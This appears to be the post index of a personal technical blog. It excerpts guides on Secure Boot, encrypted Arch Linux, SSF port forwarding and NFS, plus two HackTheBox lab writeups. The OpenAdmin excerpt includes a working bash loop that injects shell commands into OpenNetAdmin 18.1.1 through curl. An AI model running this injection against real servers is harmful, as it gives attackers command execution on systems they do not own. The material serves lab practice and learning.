Posts

Nathan Higley

Enrolling Custom Secure Boot Keys

Secure boot is a feature meant to increase the security of your computer without you usually even having to worry about it. It essentially verifies that your bootloader is actually the bootloader it says it is and makes sure the bootloader is in a list of approved bootloaders. If you want to read more about secure boot, I recommend this HowToGeek article which descirbes some of what secure boot does.

Arch Linux Full Encryption Installation Guide

Arch Linux w/ Fully Encrypted Filesystem This guide will show step by step how to create a clean Arch Linux install with a fully encrypted filesystem. This means that even the boot partition will be encrypted. The only unencrypted partition on the disk will be the EFI partition which could be configured later to use secure boot. Assuming an EFI system with GPT disk. Basic Install Stuff Make sure you can hit the outside world:

Configuring SSF to Port Forward

Configuring SSF for Port Forwarding To configure SSF you have to do different things on the server with the public facing IP and on the client which runs the service you want to forward. Install SSF Do on both Server and Client Download SSF: SSF - Secure Socket Funneling - Network tool - TCP and UDP port forwarding, SOCKS proxy, Remote shell, Native Relay protocol, Standalone Extract to /opt/ssf # unzip *.

NFS Share Setup CentOS

CentOS NFS Share Setup Misc Things Get temporary network: sudo dhclient Reboot faster: sudo init 6 Format /dev/sdb Install rpmfusion for exfat support. sudo dnf install –nogpgcheck https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm sudo dnf install –nogpgcheck https://download1.rpmfusion.org/free/el/rpmfusion-free-release-8.noarch.rpm https://download1.rpmfusion.org/nonfree/el/rpmfusion-nonfree-release-8.noarch.rpm sudo dnf config-manager –enable PowerTools sudo dnf update sudo dnf install exfat-utils fuse-exfat Format drive: sudo mkfs.exfat /dev/sdb Mount: sudo mkdir /mount-point sudo mount /dev/sdb /mount-point

HackTheBox OpenAdmin Quick Writeup

OpenAdmin Box IP: 10.10.10.171 Enumeration ╰─$ sudo nmap -T1 -p 80,443 10.10.10.171 1 2 3 4 5 6 PORT STATE SERVICE 80/tcp open http 443/tcp closed https Nmap done: 1 IP address (1 host up) scanned in 45.44 seconds http://10.10.10.171/ona ONA v18.1.1 1 2 3 4 5 6 7 #!/bin/bash URL="${1}" while true;do echo -n "$"; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done .

HackTheBox SwagShop Quick Writeup

SwagShop Machine IP: 10.10.10.140 Enumeration Nmap Scan 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 nmap -T4 -p- 10.10.10.140 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-07 15:07 EDT Nmap scan report for 10.10.10.140 Host is up (0.091s latency). Not shown: 65525 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1039/tcp filtered sbl 2525/tcp filtered ms-v-worlds 5232/tcp filtered sgi-dgl 26255/tcp filtered unknown 47037/tcp filtered unknown 48924/tcp filtered unknown 51397/tcp filtered unknown 62470/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 888.